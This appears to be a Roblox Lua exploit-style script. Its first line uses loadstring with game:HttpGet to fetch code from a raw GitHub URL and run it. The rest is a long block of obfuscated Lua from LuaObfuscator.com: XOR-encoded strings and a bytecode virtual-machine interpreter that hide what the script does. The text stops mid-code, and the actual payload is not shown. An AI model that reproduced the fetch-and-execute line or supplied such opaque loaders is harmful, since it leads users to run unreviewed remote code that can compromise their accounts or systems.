loadstring(game:HttpGet("https://raw.githubusercontent.com/PSXhuge/1/114514/666"))()
--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do
	local v0 = 0;
	local v1;
	local v2;
	local v3;
	local v4;
	local v5;
	local v6;
	local v7;
	local v8;
	local v9;
	local v10;
	local v11;
	local v12;
	local v13;
	local v14;
	local v15;
	local v16;
	local v17;
	local v18;
	local v19;
	local v20;
	local v21;
	local v22;
	local v23;
	local v24;
	while true do
		if (v0 == 2) then
			v7 = table.insert;
			v8 = nil;
			v8 = function(v26, v27, v28, v29, v30, v31, v32, v33, v34, v35)
				local v43 = 0;
				local v44;
				while true do
					if (v43 == 0) then
						v44 = {};
						for v59 = 1, #v26 do
							v7(v44, v1(v5(v2(v3(v26, v59, v59 + 1)), v2(v3(v27, 1 + ((v59 - 1) % #v27), 1 + ((v59 - 1) % #v27) + 1))) % 256));
						end
						v43 = 1;
					end
					if (v43 == 1) then
						return v6(v44);
					end
				end
			end;
			v0 = 3;
		end
		if (3 == v0) then
			v9 = _G[v8("\247\225\139\71\248\114\230\252", "\131\142\229\50\149\16")];
			v10 = _G[v8("\45\83\46\35\48\64", "\94\39\92\74")][v8("\113\253\251\80", "\19\132\143\53\219\115")];
			v11 = _G[v8("\177\151\49\137\75\46", "\194\227\67\224\37\73\37")][v8("\3\26\140\51", "\96\114\237\65\132\35\96\202")];
			v0 = 4;
		end
		if (v0 == 0) then
			v1 = string.char;
			v2 = string.byte;
			v3 = string.sub;
			v0 = 1;
		end
		if (v0 == 5) then
			v15 = _G[v8("\100\7\69\235\26", "\16\102\39\135\127\85")][v8("\34\59\39\112\40\53", "\65\84\73\19\73")];
			v16 = _G[v8("\10\243\95\251\15", "\126\146\61\151\106\219\218\40")][v8("\250\176\16\57\160\147", "\147\222\99\92\210\231\169")];
			v17 = _G[v8("\211\216\63\49", "\190\185\75\89\132\29\186\82")][v8("\166\141\249\250\150", "\202\233\156\130\230\69\145\192")];
			v0 = 6;
		end
		if (v0 == 4) then
			v12 = _G[v8("\26\18\228\183\7\1", "\105\102\150\222")][v8("\234\109\210", "\153\24\176\67\65\80\194\39")];
			v13 = _G[v8("\36\200\18\84\195\48", "\87\188\96\61\173")][v8("\211\64\106\86", "\180\51\31\52")];
			v14 = _G[v8("\78\179\153\29\53\196", "\61\199\235\116\91\163\156\44")][v8("\68\241\168", "\54\148\216\191\33\141")];
			v0 = 5;
		end
		if (v0 == 1) then
			v4 = bit32 or bit;
			v5 = v4.bxor;
			v6 = table.concat;
			v0 = 2;
		end
		if (v0 == 6) then
			v18 = _G[v8("\60\241\67\197\195\224\45", "\91\148\55\163\166\142")] or function()
				return _ENV;
			end;
			v19 = _G[v8("\100\245\27\212\114\228\14\205\118\242\3\220", "\23\144\111\185")];
			v20 = _G[v8("\214\8\242\183\239", "\166\107\147\219\131\200\147")];
			v0 = 7;
		end
		if (v0 == 7) then
			v21 = _G[v8("\15\224\243\133\56\162", "\124\133\159\224\91\214")];
			v22 = _G[v8("\106\62\179\235\124\59", "\31\80\195\138")] or _G[v8("\1\2\232\142\16", "\117\99\138\226")][v8("\249\246\176\210\123\12", "\140\152\192\179\24\103")];
			v23 = _G[v8("\15\125\235\197\171\251\233\9", "\123\18\133\176\198\153\140")];
			v0 = 8;
		end
		if (v0 == 8) then
			v24 = nil;
			v24 = function(v41, v42, ...)
				local v45 = 0;
				local v46;
				local v47;
				local v48;
				local v49;
				local v50;
				local v51;
				local v52;
				local v53;
				local v54;
				local v55;
				local v56;
				local v57;
				local v58;
				while true do
					if (v45 == 0) then
						v46 = 0;
						v47 = nil;
						v48 = nil;
						v49 = nil;
						v45 = 1;
					end
					if (v45 == 2) then
						v54 = nil;
						v55 = nil;
						v56 = nil;
						v57 = nil;
						v45 = 3;
					end
					if (v45 == 3) then
						v58 = nil;
						while true do
							local v60 = 0;
							while true do
								if (v60 == 0) then
									if (v46 == 1) then
										local v61 = 0;
										while true do
											if (1 == v61) then
												v50 = nil;
												v46 = 2;
												break;
											end
											if (v61 == 0) then
												v49 = nil;
												v49 = function(v69, v70, v71, v72, v73, v74, v75, v76, v77, v78, v79)
													if v71 then
														local v175 = 0;
														local v176;
														local v177;
														while true do
															if (v175 == 0) then
																v176 = 0;
																v177 = nil;
																v175 = 1;
															end
															if (v175 == 1) then
																while true do
																	if (v176 == 0) then
																		local v193 = 0;
																		while true do
																			if (v193 == 0) then
																				v177 = (v69 / (2 ^ (v70 - (2 - 1)))) % ((2 + 0) ^ (((v71 - (1 - 0)) - (v70 - (2 - 1))) + (662 - (37 + 130 + 494))));
																				return v177 - (v177 % ((1768 - (817 + 949)) - 1));
																			end
																		end
																	end
																end
																break;
															end
														end
													else
														local v178 = 0;
														local v179;
														local v180;
														while true do
															if (v178 == 1) then
																while true do
																	if (v179 == 0) then
																		local v194 = 0;
																		while true do
																			if (v194 == 0) then
																				v180 = (764 - (315 + 447)) ^ (v70 - (1 + 0));
																				return (((v69 % (v180 + v180)) >= v180) and (1 + (1134 - (574 + 560)))) or 0;
																			end
																		end
																	end
																end
																break;
															end
															if (v178 == 0) then
																v179 = 0;
																v180 = nil;
																v178 = 1;
															end
														end
													end
												end;
												v61 = 1;
											end
										end
									end
									if (v46 == 7) then
										local v62 = 0;
										while true do
											if (v62 == 0) then
												v58 = function(v80, v81, v82, v83, v84, v85, v86, v87, v88, v89, v90)
													local v137 = 0;
													local v138;
													local v139;
													local v140;
													local v141;
													while true do
														if (2 == v137) then
															while true do
																local v186 = 0;
																while true do
																	if (v186 == 0) then
																		if (v138 == 0) then
																			local v196 = 0;
																			while true do
																				if (0 == v196) then
																					v139 = v80[(1 + 1) - 1];
																					v140 = v80[(1 - 0) + (4 - 3)];
																					v196 = 1;
																				end
																				if (v196 == 1) then
																					v138 = 1;
																					break;
																				end
																			end
																		end
																		if (v138 == 1) then
																			local v197 = 0;
																			while true do
																				if (v197 == 0) then
																					v141 = v80[461 - (188 + 270)];
																					return function(...)
																						local v219 = 0;
																						local v220;
																						local v221;
																						local v222;
																						local v223;
																						local v224;
																						local v225;
																						while true do
																							if (v219 == 0) then
																								v220 = 0;
																								v221 = nil;
																								v219 = 1;
																							end
																							if (v219 == 1) then
																								v222 = nil;
																								v223 = nil;
																								v219 = 2;
																							end
																							if (v219 == 2) then
																								v224 = nil;
																								v225 = nil;
																								v219 = 3;
																							end
																							if (v219 == 3) then
																								while true do
																									if (v220 == 3) then
																										_G['A'], _G['B'] = v56(v20(v225));
																										if not _G['A'][(1 - 0) + (1441 - (1113 + 328))] then
																											local v252 = 0;
																											local v253;
																											local v254;
																											while true do
																												if (v252 == 1) then
																													while true do
																														if (v253 == 0) then
																															v254 = v80[4][v221] or "?";
																															error(v8("\156\51\165\237\88\93\237\170\34\165\235\90\9\172\187\112\140", "\207\80\215\132\40\41\205") .. v254 .. v8("\44\10", "\113\48\135\56\140") .. _G['A'][3 - 1]);
																															break;
																														end
																													end
																													break;
																												end
																												if (v252 == 0) then
																													v253 = 0;
																													v254 = nil;
																													v252 = 1;
																												end
																											end
																										else
																											return v22(_G['A'], 2, _G['B']);
																										end
																										break;
																									end
																									if (v220 == 1) then
																										local v246 = 0;
																										while true do
																											if (v246 == 0) then
																												v223 = {...};
																												v224 = v21("#", ...) - (1 + 0);
																												v246 = 1;
																											end
																											if (v246 == 1) then
																												v220 = 2;
																												break;
																											end
																										end
																									end
																									if (v220 == 2) then
																										local v247 = 0;
																										while true do
																											if (v247 == 0) then
																												v225 = nil;
																												v225 = function(v260, v261, v262, v263, v264)
																													local v265 = 0;
																													local v266;
																													local v267;
																													local v268;
																													local v269;
																													local v270;
																													local v271;
																													local v272;
																													local v273;
																													local v274;
																													local v275;
																													while true do
																														if (v265 == 1) then
																															v269 = v56;
																															v270 = {};
																															v271 = {};
																															v265 = 2;
																														end
																														if (3 == v265) then
																															v274 = nil;
																															v275 = nil;
																															while true do
																																local v276 = 0;
																																local v277;
																																while true do
																																	if (v276 == 0) then
																																		v277 = 0;
																																		while true do
																																			if (v277 == 0) then
																																				local v295 = 0;
																																				while true do
																																					if (v295 == 1) then
																																						v277 = 1;
																																						break;
																																					end
																																					if (v295 == 0) then
																																						v274 = v266[v221];
																																						v275 = v274[(1 + 0) - 0];
																																						v295 = 1;
																																					end
																																				end
																																			end
																																			if (1 == v277) then
																																				if (v275 <= (836 - (739 + 95))) then
																																					if (v275 <= (0 - (0 + 0))) then
																																						local v300 = 0;
																																						local v301;
																																						local v302;
																																						while true do
																																							if (v300 == 0) then
																																								v301 = 0;
																																								v302 = nil;
																																								v300 = 1;
																																							end
																																							if (v300 == 1) then
																																								while true do
																																									if (v301 == 0) then
																																										v302 = v274[1 + 1];
																																										v272[v302] = v272[v302](v22(v272, v302 + (1293 - (130 + 1162)), v222));
																																										break;
																																									end
																																								end
																																								break;
																																							end
																																						end
																																					elseif (v275 == 1) then
																																						local v307 = 0;
																																						local v308;
																																						local v309;
																																						local v310;
																																						local v311;
																																						local v312;
																																						while true do
																																							if (v307 == 2) then
																																								v312 = nil;
																																								while true do
																																									if (v308 == 1) then
																																										local v325 = 0;
																																										while true do
																																											if (v325 == 0) then
																																												v222 = (v311 + v309) - (1 + 0);
																																												v312 = 0 + 0;
																																												v325 = 1;
																																											end
																																											if (v325 == 1) then
																																												v308 = 2;
																																												break;
																																											end
																																										end
																																									end
																																									if (v308 == 2) then
																																										for v331 = v309, v222 do
																																											local v332 = 0;
																																											local v333;
																																											while true do
																																												if (v332 == 0) then
																																													v333 = 0;
																																													while true do
																																														if (v333 == 0) then
																																															v312 = v312 + (268 - ((1689 - (1131 + 296)) + (188 - (62 + 121))));
																																															v272[v331] = v310[v312];
																																															break;
																																														end
																																													end
																																													break;
																																												end
																																											end
																																										end
																																										break;
																																									end
																																									if (v308 == 0) then
																																										local v326 = 0;
																																										while true do
																																											if (v326 == 0) then
																																												v309 = v274[2];
																																												v310, v311 = v269(v272[v309](v22(v272, v309 + ((1 + 1) - 1), v274[1988 - (40 + 70 + 252 + 1623)])));
																																												v326 = 1;
																																											end
																																											if (v326 == 1) then
																																												v308 = 1;
																																												break;
																																											end
																																										end
																																									end
																																								end
																																								break;
																																							end
																																							if (0 == v307) then
																																								v308 = 0;
																																								v309 = nil;
																																								v307 = 1;
																																							end
																																							if (v307 == 1) then
																																								v310 = nil;
																																								v311 = nil;
																																								v307 = 2;
																																							end
																																						end
																																					else
																																						v272[v274[599 - (52 + 545)]] = v82[v274[1214 - (408 + 803)]];
																																					end
																																				elseif (v275 <= (1 + 3)) then
																																					if (v275 > 3) then
																																						do
																																							return;
																																						end
																																					else
																																						v272[v274[2]]();
																																					end
																																				elseif (v275 > (1 + (6 - 2))) then
																																					v272[v274[1180 - (221 + 957)]] = v274[3];
																																				else
																																					local v317 = 0;
																																					local v318;
																																					local v319;
																																					local v320;
																																					while true do
																																						if (v317 == 1) then
																																							v320 = nil;
																																							while true do
																																								if (v318 == 1) then
																																									v272[v319 + ((1 + 1) - (1 + 0))] = v320;
																																									v272[v319] = v320[v274[4]];
																																									break;
																																								end
																																								if (v318 == 0) then
																																									local v330 = 0;
																																									while true do
																																										if (v330 == 0) then
																																											v319 = v274[2];
																																											v320 = v272[v274[4 - 1]];
																																											v330 = 1;
																																										end
																																										if (1 == v330) then
																																											v318 = 1;
																																											break;
																																										end
																																									end
																																								end
																																							end
																																							break;
																																						end
																																						if (v317 == 0) then
																																							v318 = 0;
																																							v319 = nil;
																																							v317 = 1;
																																						end
																																					end
																																				end
																																				v221 = v221 + 1 + 0;
																																				break;
																																			end
																																		end
																																		break;
																																	end
																																end
																															end
																															break;
																														end
																														if (v265 == 2) then
																															v272 = {};
																															for v278 = 0 + 0 + 0 + 0, v224 do
																																if (v278 >= v268) then
																																	v270[v278 - v268] = v223[v278 + (1 - 0)];
																																else
																																	v272[v278] = v223[v278 + 1 + 0];
																																end
																															end
																															v273 = (v224 - v268) + (1783 - (621 + 1161));
																															v265 = 3;
																														end
																														if (0 == v265) then
																															v266 = v139;
																															v267 = v140;
																															v268 = v141;
																															v265 = 1;
																														end
																													end
																												end;
																												v247 = 1;
																											end
																											if (1 == v247) then
																												v220 = 3;
																												break;
																											end
																										end
																									end
																									if (0 == v220) then
																										local v248 = 0;
																										while true do
																											if (v248 == 1) then
																												v220 = 1;
																												break;
																											end
																											if (v248 == 0) then
																												v221 = 1 - 0;
																												v222 = -((1878 - (96 + 1780)) - (3 - 2));
																												v248 = 1;
																											end
																										end
																									end
																								end
																								break;
																							end
																						end
																					end;
																				end
																			end
																		end
																		break;
																	end
																end
															end
															break;
														end
														if (v137 == 1) then
															v140 = nil;
															v141 = nil;
															v137 = 2;
														end
														if (v137 == 0) then
															v138 = 0;
															v139 = nil;
															v137 = 1;
														end
													end
												end;
												return v58(v57(), {}, v42)(...);
											end
										end
									end
									v60 = 1;
								end
								if (v60 == 1) then
									if (v46 == 6) then
										local v63 = 0;
										while true do
											if (v63 == 1) then
												v58 = nil;
												v46 = 7;
												break;
											end
											if (v63 == 0) then
												v57 = nil;
												v57 = function(v91, v92, v93, v94, v95, v96, v97, v98)
													local v142 = 0;
													local v143;
													local v144;
													local v145;
													local v146;
													local v147;
													local v148;
													local v149;
													while true do
														if (2 == v142) then
															v147 = nil;
															v148 = nil;
															v142 = 3;
														end
														if (v142 == 1) then
															v145 = nil;
															v146 = nil;
															v142 = 2;
														end
														if (0 == v142) then
															v143 = 0;
															v144 = nil;
															v142 = 1;
														end
														if (3 == v142) then
															v149 = nil;
															while true do
																local v187 = 0;
																while true do
																	if (v187 == 1) then
																		if (v143 == 3) then
																			local v198 = 0;
																			while true do
																				if (v198 == 0) then
																					for v226 = 1539 - (858 + 680), v52() do
																						v145[v226 - ((1401 - (108 + 1290)) - 2)] = v57();
																					end
																					for v228 = 1, v52() do
																						v146[v228] = v52();
																					end
																					v198 = 1;
																				end
																				if (v198 == 1) then
																					return v147;
																				end
																			end
																		end
																		if (v143 == 0) then
																			local v199 = 0;
																			while true do
																				if (1 == v199) then
																					v146 = {};
																					v143 = 1;
																					break;
																				end
																				if (v199 == 0) then
																					v144 = {};
																					v145 = {};
																					v199 = 1;
																				end
																			end
																		end
																		break;
																	end
																	if (v187 == 0) then
																		if (v143 == 1) then
																			local v200 = 0;
																			while true do
																				if (1 == v200) then
																					v149 = {};
																					v143 = 2;
																					break;
																				end
																				if (v200 == 0) then
																					v147 = {v144,v145,nil,v146};
																					v148 = v52();
																					v200 = 1;
																				end
																			end
																		end
																		if (v143 == 2) then
																			local v201 = 0;
																			while true do
																				if (v201 == 0) then
																					for v230 = 1 - 0, v148 do
																						local v231 = 0;
																						local v232;
																						local v233;
																						local v234;
																						while true do
																							if (v231 == 0) then
																								v232 = 0;
																								v233 = nil;
																								v231 = 1;
																							end
																							if (v231 == 1) then
																								v234 = nil;
																								while true do
																									if (0 == v232) then
																										local v249 = 0;
																										while true do
																											if (0 == v249) then
																												v233 = v50();
																												v234 = nil;
																												v249 = 1;
																											end
																											if (1 == v249) then
																												v232 = 1;
																												break;
																											end
																										end
																									end
																									if (v232 == 1) then
																										if (v233 == (868 - (214 + 653))) then
																											v234 = v50() ~= (0 + (1045 - (35 + 1010)));
																										elseif (v233 == (97 - (44 + 51))) then
																											v234 = v53();
																										elseif (v233 == 3) then
																											v234 = v54();
																										end
																										v149[v230] = v234;
																										break;
																									end
																								end
																								break;
																							end
																						end
																					end
																					v147[(7807 - 6063) - ((3261 - 2416) + 503 + 393)] = v50();
																					v201 = 1;
																				end
																				if (v201 == 1) then
																					for v235 = 1, v52() do
																						local v236 = 0;
																						local v237;
																						local v238;
																						while true do
																							if (v236 == 0) then
																								v237 = 0;
																								v238 = nil;
																								v236 = 1;
																							end
																							if (v236 == 1) then
																								while true do
																									if (v237 == 0) then
																										v238 = v50();
																										if (v49(v238, (3 - 2) + 0 + 0, (1 + 1) - (1 + 0)) == (1499 - (1220 + 279))) then
																											local v255 = 0;
																											local v256;
																											local v257;
																											local v258;
																											local v259;
																											while true do
																												if (v255 == 0) then
																													v256 = 0;
																													v257 = nil;
																													v255 = 1;
																												end
																												if (2 == v255) then
																													while true do
																														if (v256 == 3) then
																															if (v49(v258, 3 + 0, 8 - 5) == 1) then
																																v259[(14 - 11) + 1] = v149[v259[1951 - (423 + 1524)]];
																															end
																															v144[v235] = v259;
																															break;
																														end
																														if (v256 == 0) then
																															local v280 = 0;
																															while true do
																																if (v280 == 0) then
																																	v257 = v49(v238, 9 - 7, 3 + 0);
																																	v258 = v49(v238, 11 - 7, 13 - 7);
																																	v280 = 1;
																																end
																																if (v280 == 1) then
																																	v256 = 1;
																																	break;
																																end
																															end
																														end
																														if (v256 == 1) then
																															local v281 = 0;
																															while true do
																																if (v281 == 1) then
																																	v256 = 2;
																																	break;
																																end
																																if (0 == v281) then
																																	v259 = {v51(),v51(),nil,nil};
																																	if (v257 == (0 - (0 + 0))) then
																																		local v289 = 0;
																																		local v290;
																																		while true do
																																			if (v289 == 0) then
																																				v290 = 0;
																																				while true do
																																					if (v290 == 0) then
																																						v259[1299 - (972 + 324)] = v51();
																																						v259[4 + 0] = v51();
																																						break;
																																					end
																																				end
																																				break;
																																			end
																																		end
																																	elseif (v257 == (1 - 0)) then
																																		v259[(249 - (77 + 168)) - (1 - 0)] = v52();
																																	elseif (v257 == (926 - (625 + 299))) then
																																		v259[8 - 5] = v52() - ((1296 - (434 + 860)) ^ (979 - (497 + 466)));
																																	elseif (v257 == (6 - 3)) then
																																		local v305 = 0;
																																		local v306;
																																		while true do
																																			if (v305 == 0) then
																																				v306 = 0;
																																				while true do
																																					if (v306 == 0) then
																																						v259[(1214 - (422 + 201)) - ((573 - (99 + 38)) + (473 - 321))] = v52() - ((992 - (81 + 909)) ^ (1063 - (781 + 266)));
																																						v259[14 - 10] = v51();
																																						break;
																																					end
																																				end
																																				break;
																																			end
																																		end
																																	end
																																	v281 = 1;
																																end
																															end
																														end
																														if (v256 == 2) then
																															local v282 = 0;
																															while true do
																																if (v282 == 1) then
																																	v256 = 3;
																																	break;
																																end
																																if (v282 == 0) then
																																	if (v49(v258, 1 + 0, 1) == ((961 - (417 + 542)) - 1)) then
																																		v259[(902 - 653) - (90 + 46 + (1595 - (332 + 1152)))] = v149[v259[2]];
																																	end
																																	if (v49(v258, 4 - 2, (1917 - (16 + 7)) - (1879 + 13)) == (464 - (209 + 254))) then
																																		v259[1 + 2] = v149[v259[1 + 2]];
																																	end
																																	v282 = 1;
																																end
																															end
																														end
																													end
																													break;
																												end
																												if (v255 == 1) then
																													v258 = nil;
																													v259 = nil;
																													v255 = 2;
																												end
																											end
																										end
																										break;
																									end
																								end
																								break;
																							end
																						end
																					end
																					v143 = 3;
																					break;
																				end
																			end
																		end
																		v187 = 1;
																	end
																end
															end
															break;
														end
													end
												end;
												v63 = 1;
											end
										end
									end
									if (v46 == 2) then
										local v64 = 0;
										while true do
											if (v64 == 1) then
												v51 = function(v99, v100, v101, v102, v103, v104)
													local v150 = 0;
													local v151;
													local v152;
													local v153;
													while true do
														if (v150 == 0) then
															v151 = 0;
															v152 = nil;
															v150 = 1;
														end
														if (v150 == 1) then
															v153 = nil;
															while true do
																local v188 = 0;
																while true do
																	if (v188 == 0) then
																		if (v151 == 0) then
																			local v202 = 0;
																			while true do
																				if (v202 == 1) then
																					v151 = 1;
																					break;
																				end
																				if (v202 == 0) then
																					v152, v153 = v10(v41, v47, v47 + 1 + 1);
																					v47 = v47 + 2;
																					v202 = 1;
																				end
																			end
																		end
																		if (v151 == 1) then
																			return (v153 * (2191 - (1237 + 698))) + v152;
																		end
																		break;
																	end
																end
															end
															break;
														end
													end
												end;
												v46 = 3;
												break;
											end
											if (v64 == 0) then
												v50 = function(v105, v106, v107, v108, v109, v110, v111, v112, v113)
													local v154 = 0;
													local v155;
													local v156;
													while true do
														if (v154 == 1) then
															while true do
																local v189 = 0;
																while true do
																	if (0 == v189) then
																		if (v155 == 0) then
																			local v203 = 0;
																			while true do
																				if (0 == v203) then
																					v156 = v10(v41, v47, v47);
																					v47 = v47 + 1 + 0;
																					v203 = 1;
																				end
																				if (v203 == 1) then
																					v155 = 1;
																					break;
																				end
																			end
																		end
																		if (1 == v155) then
																			return v156;
																		end
																		break;
																	end
																end
															end
															break;
														end
														if (v154 == 0) then
															v155 = 0;
															v156 = nil;
															v154 = 1;
														end
													end
												end;
												v51 = nil;
												v64 = 1;
											end
										end
									end
									v60 = 2;
								end
								if (v60 == 3) then
									if (v46 == 4) then
										local v65 = 0;
										while true do
											if (v65 == 0) then
												v53 = function(v114, v115, v116, v117, v118, v119, v120)
													local v157 = 0;
													local v158;
													local v159;
													local v160;
													local v161;
													local v162;
													local v163;
													local v164;
													while true do
														if (v157 == 2) then
															v162 = nil;
															v163 = nil;
															v157 = 3;
														end
														if (v157 == 0) then
															v158 = 0;
															v159 = nil;
															v157 = 1;
														end
														if (3 == v157) then
															v164 = nil;
															while true do
																local v190 = 0;
																while true do
																	if (1 == v190) then
																		if (2 == v158) then
																			local v204 = 0;
																			while true do
																				if (v204 == 1) then
																					v158 = 3;
																					break;
																				end
																				if (v204 == 0) then
																					v163 = v49(v160, 49 - 28, (1602 - (821 + 214)) - (243 + (783 - (403 + 87))));
																					v164 = ((v49(v160, 32) == 1) and -1) or 1;
																					v204 = 1;
																				end
																			end
																		end
																		if (v158 == 1) then
																			local v205 = 0;
																			while true do
																				if (v205 == 0) then
																					v161 = 1 + 0;
																					v162 = (v49(v160, 3 - 2, (1624 - (50 + 1532)) - (7 + 15)) * (((506 + 252) - ((136 - 84) + 704)) ^ 32)) + v159;
																					v205 = 1;
																				end
																				if (v205 == 1) then
																					v158 = 2;
																					break;
																				end
																			end
																		end
																		break;
																	end
																	if (v190 == 0) then
																		if (v158 == 3) then
																			local v206 = 0;
																			while true do
																				if (0 == v206) then
																					if (v163 == ((0 - 0) - 0)) then
																						if (v162 == ((776 - 327) - (102 + 296 + 15 + 36))) then
																							return v164 * 0;
																						else
																							local v244 = 0;
																							local v245;
																							while true do
																								if (v244 == 0) then
																									v245 = 0;
																									while true do
																										if (v245 == 0) then
																											v163 = 1;
																											v161 = 1602 - (199 + 1403);
																											break;
																										end
																									end
																									break;
																								end
																							end
																						end
																					elseif (v163 == (3109 - (728 + 334))) then
																						return ((v162 == (1477 - (1136 + 341))) and (v164 * ((291 - ((229 - 138) + 199)) / (0 + 0)))) or (v164 * NaN);
																					end
																					return v17(v164, v163 - (2266 - (888 + 355))) * (v161 + (v162 / ((5 - 3) ^ (84 - 32))));
																				end
																			end
																		end
																		if (v158 == 0) then
																			local v207 = 0;
																			while true do
																				if (v207 == 0) then
																					v159 = v52();
																					v160 = v52();
																					v207 = 1;
																				end
																				if (v207 == 1) then
																					v158 = 1;
																					break;
																				end
																			end
																		end
																		v190 = 1;
																	end
																end
															end
															break;
														end
														if (v157 == 1) then
															v160 = nil;
															v161 = nil;
															v157 = 2;
														end
													end
												end;
												v54 = nil;
												v65 = 1;
											end
											if (1 == v65) then
												v54 = function(v121, v122, v123, v124, v125, v126, v127, v128, v129, v130)
													local v165 = 0;
													local v166;
													local v167;
													local v168;
													while true do
														if (v165 == 1) then
															v168 = nil;
															while true do
																local v191 = 0;
																while true do
																	if (v191 == 1) then
																		if (v166 == 3) then
																			return v15(v168);
																		end
																		if (v166 == 1) then
																			local v208 = 0;
																			while true do
																				if (v208 == 1) then
																					v166 = 2;
																					break;
																				end
																				if (v208 == 0) then
																					v167 = v12(v41, v47, (v47 + v121) - (2 - 1));
																					v47 = v47 + v121;
																					v208 = 1;
																				end
																			end
																		end
																		break;
																	end
																	if (v191 == 0) then
																		if (v166 == 0) then
																			local v209 = 0;
																			while true do
																				if (v209 == 0) then
																					v167 = nil;
																					if not v121 then
																						local v241 = 0;
																						local v242;
																						while true do
																							if (v241 == 0) then
																								v242 = 0;
																								while true do
																									if (v242 == 0) then
																										v121 = v52();
																										if (v121 == (0 - 0)) then
																											return "";
																										end
																										break;
																									end
																								end
																								break;
																							end
																						end
																					end
																					v209 = 1;
																				end
																				if (1 == v209) then
																					v166 = 1;
																					break;
																				end
																			end
																		end
																		if (v166 == 2) then
																			local v210 = 0;
																			while true do
																				if (0 == v210) then
																					v168 = {};
																					for v239 = 2 - 1, #v167 do
																						v168[v239] = v11(v10(v12(v167, v239, v239)));
																					end
																					v210 = 1;
																				end
																				if (v210 == 1) then
																					v166 = 3;
																					break;
																				end
																			end
																		end
																		v191 = 1;
																	end
																end
															end
															break;
														end
														if (v165 == 0) then
															v166 = 0;
															v167 = nil;
															v165 = 1;
														end
													end
												end;
												v46 = 5;
												break;
											end
										end
									end
									if (v46 == 3) then
										local v66 = 0;
										while true do
											if (v66 == 1) then
												v53 = nil;
												v46 = 4;
												break;
											end
											if (v66 == 0) then
												v52 = nil;
												v52 = function(v131, v132, v133, v134, v135)
													local v169 = 0;
													local v170;
													local v171;
													local v172;
													local v173;
													local v174;
													while true do
														if (0 == v169) then
															v170 = 0;
															v171 = nil;
															v169 = 1;
														end
														if (1 == v169) then
															v172 = nil;
															v173 = nil;
															v169 = 2;
														end
														if (v169 == 2) then
															v174 = nil;
															while true do
																local v192 = 0;
																while true do
																	if (v192 == 0) then
																		if (v170 == 0) then
																			local v211 = 0;
																			while true do
																				if (v211 == 0) then
																					v171, v172, v173, v174 = v10(v41, v47, v47 + (1242 - (512 + 727)));
																					v47 = v47 + 1 + 3;
																					v211 = 1;
																				end
																				if (v211 == 1) then
																					v170 = 1;
																					break;
																				end
																			end
																		end
																		if (v170 == 1) then
																			return (v174 * (7018772 + (18437840 - 8679396))) + (v173 * (167008 - 101472)) + (v172 * (1258 - ((1334 - (174 + 994)) + 836))) + v171;
																		end
																		break;
																	end
																end
															end
															break;
														end
													end
												end;
												v66 = 1;
											end
										end
									end
									break;
								end
								if (v60 == 2) then
									if (v46 == 0) then
										local v67 = 0;
										while true do
											if (v67 == 1) then
												v41 = v13(v12(v41, 9 - 4), v8("\61\50", "\19\28\226\195\201\190\150"), function(v136)
													if (v10(v136, 3 - 1) == (109 - (94 - 64))) then
														local v181 = 0;
														local v182;
														while true do
															if (v181 == 0) then
																v182 = 0;
																while true do
																	if (v182 == 0) then
																		local v195 = 0;
																		while true do
																			if (v195 == 0) then
																				v48 = v9(v12(v136, 1 - 0, 1));
																				return "";
																			end
																		end
																	end
																end
																break;
															end
														end
													else
														local v183 = 0;
														local v184;
														local v185;
														while true do
															if (v183 == 0) then
																v184 = 0;
																v185 = nil;
																v183 = 1;
															end
															if (v183 == 1) then
																while true do
																	if (v184 == 0) then
																		v185 = v11(v9(v136, 5 + 11));
																		if v48 then
																			local v212 = 0;
																			local v213;
																			local v214;
																			while true do
																				if (v212 == 0) then
																					v213 = 0;
																					v214 = nil;
																					v212 = 1;
																				end
																				if (v212 == 1) then
																					while true do
																						local v243 = 0;
																						while true do
																							if (v243 == 0) then
																								if (v213 == 1) then
																									return v214;
																								end
																								if (v213 == 0) then
																									local v251 = 0;
																									while true do
																										if (v251 == 0) then
																											v214 = v14(v185, v48);
																											v48 = nil;
																											v251 = 1;
																										end
																										if (v251 == 1) then
																											v213 = 1;
																											break;
																										end
																									end
																								end
																								break;
																							end
																						end
																					end
																					break;
																				end
																			end
																		else
																			return v185;
																		end
																		break;
																	end
																end
																break;
															end
														end
													end
												end);
												v46 = 1;
												break;
											end
											if (v67 == 0) then
												v47 = (404 - 135) - (99 + 36 + (212 - 79));
												v48 = nil;
												v67 = 1;
											end
										end
									end
									if (v46 == 5) then
										local v68 = 0;
										while true do
											if (v68 == 0) then
												v55 = v52;
												v56 = nil;
												v68 = 1;
											end
											if (v68 == 1) then
												v56 = function(...)
													return {...}, v21("#", ...);
												end;
												v46 = 6;
												break;
											end
										end
									end
									v60 = 3;
								end
							end
						end
						break;
					end
					if (v45 == 1) then
						v50 = nil;
						v51 = nil;
						v52 = nil;
						v53 = nil;
						v45 = 2;
					end
				end
			end;
